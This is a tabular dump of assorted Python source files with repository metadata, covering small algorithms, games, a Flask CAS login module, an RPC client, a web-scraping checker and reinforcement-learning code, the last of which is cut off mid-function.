blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30 values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2 values | text stringlengths 12 5.47M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
37468aa39b27a90cb4e0370348c33e722140fafe | Python | lascardua/applied_EA_book | /operators_rep/selection/selection_tournament.py | UTF-8 | 1,439 | 3.375 | 3 | [] | no_license | # -----------------------------------------------------------
# Selection by Tournament
# -----------------------------------------------------------
# Inputs:
# pop_chrom - population of individuals
# pop_fit - fitness value of each individual
# Outputs:
# p1_chrom - chromosome of the first parent
# p2_chrom - chromosome of the second parent
# -----------------------------------------------------------
# file: selection_tournament.py
# -----------------------------------------------------------
import numpy as np
import random
# -----------------------------------------------------------
def selection_tournament(pop_chrom, pop_fit):
# number of individuals in the population
M = np.shape(pop_chrom)[0]
if M <= 3:
print('selection_tournament --> M must be bigger than 3')
exit()
# randomly select num_indvs individuals without replacement
num_indvs = 3 # this number could be a formal parameter
inds = random.sample(range(1, M), num_indvs)
selected_indvs = pop_chrom[inds]
selected_fits = pop_fit[inds]
# sort in descending order
sorted_idx = np.argsort(-selected_fits)
# pick the two most fit individuals
ind_p1 = sorted_idx[0]
p1_chrom = selected_indvs[ind_p1]
ind_p2 = sorted_idx[1]
p2_chrom = selected_indvs[ind_p2]
# return selected parents
return p1_chrom, p2_chrom
| true |
3f542740d593e931dc937dd26617242a25bb61b0 | Python | NickolayVasilishin/repository | /python/ml/pandas/less10.py | UTF-8 | 655 | 3.234375 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Mon Aug 15 17:56:06 2016
@author: Nikolay_Vasilishin
From DataFrame to Excel
From Excel to DataFrame
From DataFrame to JSON
From JSON to DataFrame
"""
import pandas as pd
import sys
# Create DataFrame
d = [1,2,3,4,5,6,7,8,9]
df = pd.DataFrame(d, columns = ['Number'])
# Export to Excel
df.to_excel('Lesson10.xlsx', sheet_name = 'testing', index = False)
# Path to excel file
# Your path will be different, please modify the path below.
location = r'Lesson10.xlsx'
# Parse the excel file
df = pd.read_excel(location, 0)
df.head()
# JSON
df.to_json('Lesson10.json')
# read json file
df2 = pd.read_json(location) | true |
ece36c3b4fa8669945a1afb8c5d75b74b3de104b | Python | isaacdchan/CSS343 | /Huffman.py | UTF-8 | 2,263 | 3.421875 | 3 | [] | no_license | from collections import defaultdict
import sys
class Node:
def __init__(self, count, val=None):
self.left = None
self.right = None
self.count = count
self.val = val
class Tree:
def __init__(self, counts):
self.counts = sorted(counts, key=lambda Node: Node.count)
self.root = None
self.build()
def insert(self, node):
i = 0
while node.count < self.counts[i].count:
i+=1
self.counts.insert(i, node)
def build(self):
while len(self.counts) > 2:
node1 = self.counts.pop(0)
node2 = self.counts.pop(1)
# if node1.val:
# print(node1.count, chr(node1.val))
# if node2.val:
# print(node2.count, chr(node2.val))
# print('-------')
combinedNode = Node(node1.count + node2.count)
self.insert(combinedNode)
self.root = self.counts[0]
def encode(file_name):
count_nodes = generate_counts(file_name)
tree = Tree(count_nodes)
generate_codes(tree.root)
encoded_file_name = "encoded_" + file_name
def generate_counts(file_name):
f = open(file_name, 'r')
chars = f.read()
ascii_dict = [0] * 256
for char in chars:
ascii_dict[ord(char)] += 1
ascii_counts = []
for ascii_code, count in enumerate(ascii_dict):
if count > 0:
ascii_counts.append(Node(count, ascii_code))
return ascii_counts
def generate_codes(root):
code_dict = defaultdict(str)
def inorder(node, code):
print(0)
if node:
print(1)
if node.val:
print(2)
code_dict[node.val] = code
inorder(root.left, code + "0")
inorder(root.right, code + "1")
inorder(root, "")
for key, value in code_dict.items():
print(key, value)
if __name__ == '__main__':
if len(sys.argv) > 1:
file_name_input = sys.argv[1]
# try:
f = open(file_name_input, 'r')
encode(file_name_input)
# except Exception as e:
# print('Error processing input:', e)
else:
print('Please re-run program with file name input') | true |
075a599daa05d808f0b90c3f0dce95e77d8d10f3 | Python | Mbank8/DojoAssignments | /Python/Fundamentals/funWithFunctions.py | UTF-8 | 604 | 3.796875 | 4 | [] | no_license |
# def odd_even (a):
# while a < 2001:
# if a % 2 != 0:
# print "Number is %d. This is an odd number." % (a)
# a += 1
# else:
# print "Number is %d. This is an even number." % (a)
# a+= 1
# return(a)
# odd_even(1)
# def multiply(arr,num):
# for x in range(len(arr)):
# arr[x] *= num
# return arr
# a = [2,4,10,16]
# b = multiply(a,5)
# print b
def layered_multiples(arr):
print arr
for x in range(len(arr)):
arr[x] *= num
arr[x] = 1
return arr
x = layered_multiples(([2,4,5],3))
print x | true |
59b1f263ef6fe8b5ac65010c44d96f1420b7d59c | Python | stevenwalton/CompMethods | /Python_Notes/Games/hangman.py | UTF-8 | 6,481 | 4.03125 | 4 | [] | no_license | # Hangman game
import random as r
import csv
import os
# First thing we need to do is create the drawings that will be used. Time to employ your ascii art skills.
# You can get more creative and import pictures, but I will leave that for the student to solve. We will
# probably go over pictures and graphs later. But for now let's do this oldschool.
HANGMANPICS = ['''
+---+
| |
|
|
|
|
=======''','''
+---+
| |
O |
|
|
|
=======''','''
+---+
| |
O |
| |
|
|
=======''','''
+---+
| |
O |
/| |
|
|
=======''','''
+---+
| |
O |
/|\|
|
|
=======''','''
+---+
| |
O |
/|\|
/ |
|
=======''','''
+---+
| |
O |
/|\|
/ \|
|
=======''']
# We need to create a dictionary of words. Instead of having it here, we are going to make the program a little more advanced and user friendly by using a user defined dictionary. There will be one word per line in the text
# file that can be modified at will.
### use if you want a set list of words
#dictionary = 'ant baboon badger'.split()
# use if you want to have a file of words that can be read (a dictionary per say)
dictionary = []
with open('wordlist.txt', 'rb') as csvfile:
# This list was made in a way that there is a word on each line. No commas or anything, just \n between words
reader = csv.reader(csvfile, delimiter=' ')
dictionary = list(reader)
# We want our program to pick a random word from our dictionary
def getRandomWord(WordList):
# We're going to pick a random element of our list
wordIndex = r.randint(0, len(WordList)-1)
# We need to get rid of the commas from the list. Otherwise we will have non-character inputs for our game
return ', '.join(WordList[wordIndex])
# We want to display the board, this function will do this
def displayBoard(HANGMANPICS, missedLetters, correctLetters, word):
# We're going to print which hangman pic we need. Which is chosen by the number of missed letters
print HANGMANPICS[len(missedLetters)]
# We also want to display the letters that we have missed, so that we don't guess them again
print "Missed letters: " + missedLetters
# We'll print the blanks so that we know how many letters the word is.
blanks = '_' * len(word)
# We are also filling in those blanks with the letters that we have guessed correctly.
for i in range(len(word)):
if word[i] in correctLetters:
blanks = blanks[:i] + word[i] + blanks[i+1:]
print blanks
# Let's make a function to gather the user input for guesses. It's easier to define this as a function
def getGuess(alreadyGuessed):
while True:
guess = raw_input("Guess a letter: ")
guess = guess.lower() # This is so we can only work with one case. That'll show those CAPITALISTS
if len(guess) != 1:
print "Please enter a single letter..."
elif guess in alreadyGuessed:
print "You already guessed that letter!!"
elif guess not in 'abcdefghijklmnopqrstuvwxyz':
print "Please print an English letter..."
else:
return guess
# Notice what I said before about not assuming your user is intelligent. They might be intelligent but just like breaking programs (which is the best way to learn how it works, might I add).
# Let's clear the screen every time we start a new game or finish. You can also make this clear every loop
def clearScreen():
try: # Try literally tries something, and if it doesn't work just continues
os.system('cls') # this works for windows
finally: # Executes no matter what. This is an assumption that if they aren't on winblows
# then they are on a *nix machine. Can this cause problems? (Answer is probably).
# Student is left to research different errors and exceptions to solve this.
os.system('clear') # this is for *nix machines (linux, osx, unix)
#Obviously our game is so great that we will want to play it again. Right? Well let's let the user decide
def playAgain():
again = raw_input("Would you like to play again?(y/n): ").lower()
if "y" in again: # Note that this will run if they type any word with a y in it. Left as an exercise for the
# student. How can get words like "type" not to return a new game?
return True
# Now that we are done with our definitions we will get to the actual game.
# Question for student, why do we not add this as the first line of the while loop? Why here?
print "H A N G M A N"
missedLetters = '' # We always want to initialize variables
correctLetters = ''
word = getRandomWord(dictionary)
gameIsDone = False
while True:
# We're going to clear the screen and print the title every time the loop executes. This keeps things clean
# It's a lot more professional looking than if we don't
clearScreen()
print "H A N G M A N"
# Now is when we will start using the definitions that we created earlier. Note that input names don't
# have to match the name we gave them in the definition, only the place.
displayBoard(HANGMANPICS, missedLetters, correctLetters, word)
# The rest shoudl be easily readable and understandable by the student at this point.
guess = getGuess(missedLetters + correctLetters)
if guess in word:
correctLetters = correctLetters + guess
foundAllLetters = True # We even initialize this
for i in range(len(word)):
if word[i] not in correctLetters:
foundAllLetters = False
break
if foundAllLetters:
print "Good job! The word was " + word + " You WIN!!!!"
gameIsDone = True
else:
missedLetters = missedLetters + guess
if len(missedLetters) == len(HANGMANPICS)-1:
displayBoard(HANGMANPICS, missedLetters,correctLetters,word)
print "OH NO!!!! You ran out of guesses and let the man die. He could have been innocent! The correct word was " + word
gameIsDone = True
if gameIsDone:
if playAgain() is True:
clearScreen()
missedLetters = ''
correctLetters = ''
gameIsDone = False
word = getRandomWord(dictionary)
else:
clearScreen()
break
| true |
12e5b250b785817e2a7f6a5154a5b37779da6049 | Python | MasterRoshan/flask-cas-ng | /flask_cas/routing.py | UTF-8 | 5,347 | 2.625 | 3 | [
"BSD-3-Clause"
] | permissive | import flask
from xmltodict import parse
from flask import current_app
from .cas_urls import create_cas_login_url
from .cas_urls import create_cas_logout_url
from .cas_urls import create_cas_validate_url
try:
from urllib import urlopen
except ImportError:
from urllib.request import urlopen
blueprint = flask.Blueprint('cas', __name__)
@blueprint.route('/login/')
def login():
"""
This route has two purposes. First, it is used by the user
to login. Second, it is used by the CAS to respond with the
`ticket` after the user logs in successfully.
When the user accesses this url, they are redirected to the CAS
to login. If the login was successful, the CAS will respond to this
route with the ticket in the url. The ticket is then validated.
If validation was successful the logged in username is saved in
the user's session under the key `CAS_USERNAME_SESSION_KEY` and
the user's attributes are saved under the key
'CAS_USERNAME_ATTRIBUTE_KEY'
"""
cas_token_session_key = current_app.config['CAS_TOKEN_SESSION_KEY']
redirect_url = create_cas_login_url(
current_app.config['CAS_SERVER'],
current_app.config['CAS_LOGIN_ROUTE'],
flask.url_for('.login', origin=flask.session.get('CAS_AFTER_LOGIN_SESSION_URL'), _external=True))
if 'ticket' in flask.request.args:
flask.session[cas_token_session_key] = flask.request.args['ticket']
if cas_token_session_key in flask.session:
if validate(flask.session[cas_token_session_key]):
if 'CAS_AFTER_LOGIN_SESSION_URL' in flask.session:
redirect_url = flask.session.pop('CAS_AFTER_LOGIN_SESSION_URL')
elif flask.request.args.get('origin'):
redirect_url = flask.request.args['origin']
else:
redirect_url = flask.url_for(
current_app.config['CAS_AFTER_LOGIN'])
else:
del flask.session[cas_token_session_key]
current_app.logger.debug('Redirecting to: {0}'.format(redirect_url))
return flask.redirect(redirect_url)
@blueprint.route('/logout/')
def logout():
"""
When the user accesses this route they are logged out.
"""
cas_username_session_key = current_app.config['CAS_USERNAME_SESSION_KEY']
cas_attributes_session_key = current_app.config['CAS_ATTRIBUTES_SESSION_KEY']
if cas_username_session_key in flask.session:
del flask.session[cas_username_session_key]
if cas_attributes_session_key in flask.session:
del flask.session[cas_attributes_session_key]
if(current_app.config['CAS_AFTER_LOGOUT'] is not None):
redirect_url = create_cas_logout_url(
current_app.config['CAS_SERVER'],
current_app.config['CAS_LOGOUT_ROUTE'],
current_app.config['CAS_AFTER_LOGOUT'])
else:
redirect_url = create_cas_logout_url(
current_app.config['CAS_SERVER'],
current_app.config['CAS_LOGOUT_ROUTE'])
current_app.logger.debug('Redirecting to: {0}'.format(redirect_url))
return flask.redirect(redirect_url)
def validate(ticket):
"""
Will attempt to validate the ticket. If validation fails, then False
is returned. If validation is successful, then True is returned
and the validated username is saved in the session under the
key `CAS_USERNAME_SESSION_KEY` while tha validated attributes dictionary
is saved under the key 'CAS_ATTRIBUTES_SESSION_KEY'.
"""
cas_username_session_key = current_app.config['CAS_USERNAME_SESSION_KEY']
cas_attributes_session_key = current_app.config['CAS_ATTRIBUTES_SESSION_KEY']
current_app.logger.debug("validating token {0}".format(ticket))
cas_validate_url = create_cas_validate_url(
current_app.config['CAS_SERVER'],
current_app.config['CAS_VALIDATE_ROUTE'],
flask.url_for('.login', origin=flask.session.get('CAS_AFTER_LOGIN_SESSION_URL'), _external=True),
ticket)
current_app.logger.debug("Making GET request to {0}".format(
cas_validate_url))
xml_from_dict = {}
isValid = False
try:
xmldump = urlopen(cas_validate_url).read().strip().decode('utf8', 'ignore')
xml_from_dict = parse(xmldump)
isValid = True if "cas:authenticationSuccess" in xml_from_dict["cas:serviceResponse"] else False
except ValueError:
current_app.logger.error("CAS returned unexpected result")
if isValid:
current_app.logger.debug("valid")
xml_from_dict = xml_from_dict["cas:serviceResponse"]["cas:authenticationSuccess"]
username = xml_from_dict["cas:user"]
attributes = xml_from_dict.get("cas:attributes", {})
if attributes and "cas:memberOf" in attributes:
if isinstance(attributes["cas:memberOf"], basestring):
attributes["cas:memberOf"] = attributes["cas:memberOf"].lstrip('[').rstrip(']').split(',')
for group_number in range(0, len(attributes['cas:memberOf'])):
attributes['cas:memberOf'][group_number] = attributes['cas:memberOf'][group_number].lstrip(' ').rstrip(' ')
flask.session[cas_username_session_key] = username
flask.session[cas_attributes_session_key] = attributes
else:
current_app.logger.debug("invalid")
return isValid
| true |
4a2e24ee1975818d98f2f4bd9ffcdb241cb44808 | Python | xmonader/js-ng | /jumpscale/clients/gedis/gedis.py | UTF-8 | 4,921 | 2.75 | 3 | [] | no_license | from jumpscale.clients.base import Client
from jumpscale.core.base import fields
from jumpscale.god import j
from functools import partial
import json
from typing import List
class ActorProxy:
def __init__(self, actor_name, actor_info, gedis_client):
"""ActorProxy to remote actor on the server side
Arguments:
actor_name {str} -- [description]
actor_info {dict} -- actor information dict e.g { method_name: { args: [], 'doc':...} }
gedis_client {GedisClient} -- gedis client reference
"""
self.actor_name = actor_name
self.actor_info = actor_info
self._gedis_client = gedis_client
def __dir__(self):
"""Delegate the available functions on the ActorProxy to `actor_info` keys
Returns:
list -- methods available on the ActorProxy
"""
return list(self.actor_info.keys())
def __getattr__(self, attr):
"""Return a function representing the remote function on the actual actor
Arguments:
attr {str} -- method name
Returns:
function -- function waiting on the arguments
"""
def mkfun(actor_name, fn_name, *args):
return self._gedis_client.execute(self.actor_name, fn_name, *args)
mkfun.__doc__ = self.actor_info[attr]["doc"]
return partial(mkfun, self.actor_name, attr)
class ActorsCollection:
def __init__(self, gedis_client):
"""ActorsCollection to allow using the actors like `gedis.actors.ACTORNAME.ACTORMETHOD(*ACTOR_METHOD_ARGS)
Arguments:
gedis_client {GedisClient} -- gedis client
"""
self._gedis_client = gedis_client
self._actors = {}
@property
def actors_names(self):
# TODO: CHECK IF WE SHOULD USE CACHE HERE?
return json.loads(self._gedis_client.execute("system", "list_actors"))
def __dir__(self):
return self.actors_names
def _load_actor(self, actor_name):
"""Load actor: creating ActorProxy for remote actor `actor_name` and store it in the collection.
Arguments:
actor_name {str} -- remote actor name
Returns:
ActorProxy -- ActorProxy that can call the remote actor.
"""
actor_info = json.loads(self._gedis_client.execute(actor_name, "info"))
self._actors[actor_name] = ActorProxy(actor_name, actor_info, self._gedis_client)
return self._actors[actor_name]
def __getattr__(self, actor_name):
if actor_name not in self._actors:
return self._load_actor(actor_name)
else:
return self._actors[actor_name]
class GedisClient(Client):
name = fields.String(default="local")
hostname = fields.String(default="localhost")
port = fields.Integer(default=16000)
def __init__(self):
super().__init__()
self._redisclient = None
self.redis_client
self.actors = ActorsCollection(self)
@property
def redis_client(self):
if not self._redisclient:
try:
self._redisclient = j.clients.redis.get(f"gedis_{self.name}")
except:
self._redisclient = j.clients.redis.new(f"gedis_{self.name}")
self._redisclient.hostname = self.hostname
self._redisclient.port = self.port
self._redisclient.save()
return self._redisclient
def register_actor(self, actor_name: str, actor_path: str):
"""Register actor on the server side (gedis server)
Arguments:
actor_name {str} -- actor name to be used in the system
actor_path {str} -- actor path on the remote gedis server
"""
return self.execute("system", "register_actor", actor_name, actor_path)
def execute(self, actor_name: str, actor_method: str, *args):
"""Execute
Arguments:
actor_name {str} -- actor name
actor_name {str} -- actor method to execute
*args {List[object]} -- *args of parameters
"""
return self._redisclient.execute_command(actor_name, actor_method, *args)
def doc(self, actor_name: str):
"""Gets the documentation of actor `actor_name`
Arguments:
actor_name {str} -- actor to retrieve its documentation
"""
return json.loads(self.execute(actor_name, "info"))
def ppdoc(self, actor_name):
"""Pretty print documentation of actor
Arguments:
actor_name {str} -- actor to print its documentation.
"""
res = self.doc(actor_name)
print(json.dumps(res, indent=2, sort_keys=True))
def list_actors(self) -> List[str]:
"""List actors
Returns:
List[str] -- list of actors available on gedis server.
"""
return json.loads(self.execute("system", "list_actors"))
| true |
b2f63e1eb2d1da0b21e2bf4173b030511c7155f3 | Python | Leahxuliu/Data-Structure-And-Algorithm | /Python/巨硬/A1链表深拷贝.py | UTF-8 | 1,919 | 3.734375 | 4 | [] | no_license | '''
链表深copy,可能有环,也可能没有环
'''
'''
是否有重复数?
若无重复数,用一个visited来记录访问点的值 行不通!因为没法curr.next = cycle beginer
1. 判断是否有环
2. 若有环,找环交点,记录环交点
3. 构建新链表
'''
class Node:
def __init__(self, val):
self.val = val
self.next = None
def copy_node(head):
'''
deep copy NodeList
return new root
'''
# corner case
if head == None:
return None
# visited = set()
# new_head = Node(0)
# curr = new_head
# while head:
# if head in visited:
# curr.next =
# visited.add(head)
# curr.next = Node(head.val)
# curr = curr.next
# check cycle
s = head
f = head
meet = None
while s and f and f.next:
s = s.next
f = f.next.next
if s == f:
meet = s
break
s = head
f = meet
while s != f and f:
s = s.next
f = f.next
meet = f
# deep copy nodelist
new_root = Node(0)
curr = new_root
new_meet = None
while head:
if meet:
# first time meet
if head == meet and new_meet == None:
curr.next = Node(head.val)
curr = curr.next
new_meet = curr
head = head.next
# second time
elif head == meet and new_meet:
curr.next = new_meet
break
curr.next = Node(head.val)
curr = curr.next
head = head.next
return new_root.next
one = Node(1)
two = Node(2)
three = Node(3)
four = Node(4)
one.next = two
two.next = three
three.next = four
four.next = two
new = copy_node(one)
for i in range(6):
print(one.val, new.val)
one = one.next
new = new.next
| true |
d66c55d189f72d1d3be558982695ab1fd47b7178 | Python | pi408637535/Algorithm | /com/study/algorithm/daily/51. N-Queens.py | UTF-8 | 1,338 | 3.203125 | 3 | [] | no_license | class Solution(object):
def solveNQueens(self, n):
"""
:type n: int
:rtype: List[List[str]]
"""
if n < 1: return []
self.res = [] # res结构[[],[],...],每个元素的res[i]代表着一个解。每个解res[i],每一个元素代表着一个col
self.cols = set()
self.pie = set()
self.na = set()
self.dfs(n, 0, [])
return self._generate_result(n)
def dfs(self, n, row, cur):
# recursion terminator
if row >= n:
self.res.append(cur)
return
for col in range(n):
if col in self.cols or (row + col) in self.pie or (row - col) in self.na:
continue
else:
# update the flags
self.cols.add(col)
self.pie.add(col + row)
self.na.add(row - col)
self.dfs(n, row + 1, cur + [col])
self.cols.remove(col)
self.pie.remove(col + row)
self.na.remove(row - col)
def _generate_result(self, n):
board = []
for res in self.res:
for i in res:
board.append("." * i + "Q" + "." * (n - i - 1))
return [board[i:i + n] for i in range(0, len(board), n)]
if __name__ == '__main__':
pass | true |
4361eecfcb4b58122b29383805981b1fa04c42f8 | Python | michelbauer/pypet | /pypet/utils/comparisons.py | UTF-8 | 5,434 | 2.90625 | 3 | [
"BSD-3-Clause"
] | permissive | """Module containing utility functions to compare parameters and results"""
__author__ = 'Robert Meyer'
from collections import Sequence, Mapping, Set
try:
from future_builtins import zip
except ImportError: # not 2.6+ or is 3.x
try:
from itertools import izip as zip # < 2.5 or 3.x
except ImportError:
pass
import numpy as np
import pandas as pd
import pypet.pypetconstants as pypetconstants
import pypet.compat as compat
def results_equal(a, b):
"""Compares two result instances
Checks full name and all data. Does not consider the comment.
:return: True or False
:raises: ValueError if both inputs are no result instances
"""
if a.v_is_parameter or b.v_is_parameter:
raise ValueError('Both inputs are not results.')
if a.v_is_parameter or b.v_is_parameter:
return False
if not a.v_name == b.v_name:
return False
if not a.v_location == b.v_location:
return False
if not a.v_full_name == b.v_full_name:
return False
akeyset = set(a._data.keys())
bkeyset = set(b._data.keys())
if akeyset != bkeyset:
return False
for key in a._data:
val = a._data[key]
bval = b._data[key]
if not nested_equal(val, bval):
return False
return True
def parameters_equal(a, b):
"""Compares two parameter instances
Checks full name, data, and ranges. Does not consider the comment.
:return: True or False
:raises: ValueError if both inputs are no parameter instances
"""
if (not b.v_is_parameter and
not a.v_is_parameter):
raise ValueError('Both inputs are not parameters')
if (not b.v_is_parameter or
not a.v_is_parameter):
return False
if not a.v_name == b.v_name:
return False
if not a.v_location == b.v_location:
return False
if not a.v_full_name == b.v_full_name:
return False
# I allow different comments for now
# if not a.get_comment() == b.get_comment():
# return False
if not a._values_of_same_type(a.f_get(), b.f_get()):
return False
if not a._equal_values(a.f_get(), b.f_get()):
return False
if not len(a) == len(b):
return False
if a.f_has_range():
for myitem, bitem in zip(a.f_get_range(), b.f_get_range()):
if not a._values_of_same_type(myitem, bitem):
return False
if not a._equal_values(myitem, bitem):
return False
return True
def nested_equal(a, b):
"""Compares two objects recursively by their elements, also handling numpy objects.
Assumes hashable items are not mutable in a way that affects equality.
Based on the suggestion from HERE_, thanks again Lauritz V. Thaulow :-)
.. _HERE: http://stackoverflow.com/questions/18376935/best-practice-for-equality-in-python
"""
if a is b:
return True
# for types that support __eq__
if hasattr(a, '__eq__'):
try:
custom_eq = a == b
if isinstance(custom_eq, bool):
return custom_eq
except ValueError:
pass
# Check equality according to type type [sic].
if a is None:
return b is None
if isinstance(a, (compat.unicode_type, compat.bytes_type)):
return a == b
if isinstance(a, pypetconstants.PARAMETER_SUPPORTED_DATA):
return a == b
if isinstance(a, np.ndarray):
return np.all(a == b)
if isinstance(a, (pd.Panel, pd.Panel4D)):
return nested_equal(a.to_frame(), b.to_frame())
if isinstance(a, (pd.DataFrame, pd.Series)):
try:
new_frame = a == b
new_frame = new_frame | (pd.isnull(a) & pd.isnull(b))
return np.all(new_frame.as_matrix())
except ValueError:
# The Value Error can happen if the data frame is of dtype=object and contains
# numpy arrays. Numpy array comparisons do not evaluate to a single truth value
if isinstance(a, pd.DataFrame):
for name in a:
cola = a[name]
if not name in b:
return False
colb = b[name]
if not len(cola) == len(colb):
return False
for idx, itema in enumerate(cola):
itemb = colb[idx]
if not nested_equal(itema, itemb):
return False
else:
if not len(a) == len(b):
return False
for idx, itema in enumerate(a):
itemb = b[idx]
if not nested_equal(itema, itemb):
return False
return True
if isinstance(a, Sequence):
return all(nested_equal(x, y) for x, y in zip(a, b))
if isinstance(a, Mapping):
if set(a.keys()) != set(b.keys()):
return False
return all(nested_equal(a[k], b[k]) for k in a.keys())
if isinstance(a, Set):
return a == b
if hasattr(a, '__dict__'):
if not hasattr(b, '__dict__'):
return False
if set(a.__dict__.keys()) != set(b.__dict__.keys()):
return False
return all(nested_equal(a.__dict__[k], b.__dict__[k]) for k in a.__dict__.keys())
return id(a) == id(b) | true |
d0499d282f7f17e4276beaf093da21f21105f355 | Python | snsk/_sandbox | /check_deck_reservement/main.py | UTF-8 | 1,041 | 2.78125 | 3 | [] | no_license | from get_chrome_driver import GetChromeDriver
from selenium import webdriver
import sys
get_driver = GetChromeDriver()
get_driver.install()
def driver_init():
options = webdriver.ChromeOptions()
options.add_argument('--headless')
options.add_argument('--log-level=3')
return webdriver.Chrome(options=options)
driver = driver_init()
driver.implicitly_wait(10)
driver.get('https://www.steamdeck.com/ja/')
expect_text = 'Steam Deckは、2022年2月より、アメリカ、カナダ、欧州連合、イギリスで出荷が開始されます。その後、他の地域でも出荷予定です。今後のお知らせをお楽しみに。'
if len(driver.find_elements_by_id('availability'))>0:
actual_text = driver.find_element_by_xpath('/html/body/div[3]/section[12]/div/div[2]/p').text
else:
print("Steam Deck availability region has changed!")
if expect_text == actual_text:
print('Steam Deck does not available my region ...')
else:
sys.exit("Steam Deck availability region has changed!")
driver.quit()
| true |
b9258881ed7b43d83f4ac5cbab61e820b8e11db2 | Python | jaychsu/algorithm | /lintcode/647_substring_anagrams.py | UTF-8 | 931 | 3.421875 | 3 | [] | no_license | """
REF: https://leetcode.com/problems/find-all-anagrams-in-a-string/discuss/92007/
"""
class Solution:
def findAnagrams(self, s, t):
"""
:type s: str
:type t: str
:rtype: List[int]
"""
ans = []
if not s or not t or len(t) > len(s):
return ans
F = {}
for c in t:
F[c] = F.get(c, 0) + 1
n, m, cnt = len(s), len(t), len(F)
left = right = 0
while right < n:
if s[right] in F:
F[s[right]] -= 1
if F[s[right]] == 0:
cnt -= 1
right += 1
while cnt == 0:
if s[left] in F:
F[s[left]] += 1
if F[s[left]] == 1:
cnt += 1
if right - left == m:
ans.append(left)
left += 1
return ans
| true |
35cb7c85f468f2e552d927c7a95d8fbff3c39939 | Python | kimgwanghoon/openbigdata | /01_jumptopy/chap05/ex/ex03.py | UTF-8 | 297 | 3.453125 | 3 | [] | no_license | while True:
input_su=int(input("양수를 입력하세요 (종료-1): "))
if input_su!=-1:
if input_su%10==0:
print("입력한 숫자는 10의 배수입니다.")
else:
print("입력한 숫자는 10의 배수가 아닙니다")
else:
break | true |
09ea6bc63e9d7f7257cb5786c4045909d957cc97 | Python | duracell/challenges | /cstutoringcenter.com/crypto/15/15.py | UTF-8 | 190 | 3.171875 | 3 | [] | no_license | #!/usr/bin/env python
def main():
secret_num = 7
char_list = [71, 72, 77, 25, 79, 62, 75, 82, 25, 76, 62, 60, 78, 75, 62]
for char in char_list:
print chr(char + secret_num),
main()
| true |
9e5b6c0ad7465073f5b2a0e304003aaf011bfbde | Python | mangelajo/neutrontool | /neutrontool/colors.py | UTF-8 | 413 | 2.78125 | 3 | [] | no_license | class Colors:
HEADER = '\033[95m'
BLUE = '\033[94m'
GREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
color_mat = {'header':HEADER ,'blue':BLUE, 'green':GREEN ,
'warning':WARNING ,'fail':FAIL}
@staticmethod
def color(color, string):
return Colors.color_mat.get(color,Colors.ENDC) + string + Colors.ENDC
color = Colors.color
| true |
8591273ed1ea38ea4937a4cfba36562e154ff4b0 | Python | AutomatedTester/rogoto-py | /test/test_parser.py | UTF-8 | 2,426 | 2.875 | 3 | [
"Apache-2.0"
] | permissive | from rogoto import RogotoParser
from rogoto import RogotoParserException
def test_invalid_syntax():
parser = RogotoParser()
try:
parser.parse('goblydegoop')
raise AssertionError('Should have thrown a RogotoParserException')
except RogotoParserException:
pass
def test_pendown():
parser = RogotoParser()
results = parser.parse('pendown')
assert ['pendown'] == results
def test_pendown_abbreviated():
parser = RogotoParser()
results = parser.parse('pd')
assert ['pendown'] == results
def test_penup():
parser = RogotoParser()
results = parser.parse('penup')
assert ['penup'] == results
def test_penup_abbreviated():
parser = RogotoParser()
results = parser.parse('pu')
assert ['penup'] == results
def test_forward():
parser = RogotoParser()
results = parser.parse('forward 10')
assert ['forward 10'] == results
def test_forward_abbreviated():
parser = RogotoParser()
results = parser.parse('fd 10')
assert ['forward 10'] == results
def test_backward():
parser = RogotoParser()
results = parser.parse('backward 10')
assert ['backward 10'] == results
def test_backward_abbreviated():
parser = RogotoParser()
results = parser.parse('bk 10')
assert ['backward 10'] == results
def test_left():
parser = RogotoParser()
results = parser.parse('left 10')
assert ['left 10'] == results
def test_left_abbreviated():
parser = RogotoParser()
results = parser.parse('lt 10')
assert ['left 10'] == results
def test_right():
parser = RogotoParser()
results = parser.parse('right 10')
assert ['right 10'] == results
def test_right_abbreviated():
parser = RogotoParser()
results = parser.parse('rt 10')
assert ['right 10'] == results
def test_can_clear_code_array():
parser = RogotoParser()
results = parser.parse('rt 10')
assert ['right 10'] == results
parser.clear()
assert [] == parser.code_to_execute
def test_can_keep_pen_state():
parser = RogotoParser()
assert parser.pen_state == 'up'
parser.parse('pd')
assert parser.pen_state == 'down'
parser.parse('penup')
assert parser.pen_state == 'up'
def test_multiline_parser():
parser = RogotoParser()
results = parser.parse('pendown\nfd 10\nlt 45\nfd 10\npenup')
assert ['pendown', 'forward 10', 'left 45', 'forward 10', 'penup'] == results
| true |
b82dd2de1c9e536f67e2765b79442e1683f0389a | Python | NguyenHan123-Aston/cp1404practicals | /prac_01/broken_score.py | UTF-8 | 538 | 3.671875 | 4 | [] | no_license | """
CP1404 3rd practical
Pseudo code for score calculating
Nguyen Hoang Ba Han - 13587248
"""
SCORE = (float(input("Enter score: ")))
print(SCORE)
# Using if-else format to find the result for each score input
if SCORE < 0 or SCORE > 100:
print("Invalid score. Please try again")
else:
if SCORE >= 90:
print("Excellent")
elif SCORE >= 80:
print("Great")
elif SCORE >= 50:
print("Passable")
elif SCORE < 50:
print("Bad")
else:
print("Invalid score. Please try again")
print("Thank you")
| true |
8c6075bb2fb1ea284f1efdf08feaa70768fb5a35 | Python | AbdurNawaz/Policy-Gradient | /reinforce.py | UTF-8 | 2,181 | 2.765625 | 3 | [] | no_license | import numpy as np
import gym
import time
import Policy
import matplotlib.pyplot as plt
from collections import deque
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.distributions import Categorical
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
env = gym.make('CartPole-v0')
print(env.observation_space)
print(env.action_space)
policy = Policy.Policy().to(device)
optimizer = torch.optim.Adam(policy.parameters(), lr=1e-2)
def reinforce(n_episodes=1000, max_t=1000, gamma=1.0, print_every=100):
scores = []
scores_deque = deque(maxlen=100)
for i_episode in range(1, n_episodes+1):
saved_log_probs = []
rewards = []
state = env.reset()
for i in range(max_t):
action, log_prob = policy.act(state)
saved_log_probs.append(log_prob)
state, reward, done, _ = env.step(action)
rewards.append(reward)
if done:
break
scores.append(sum(rewards))
scores_deque.append(sum(rewards))
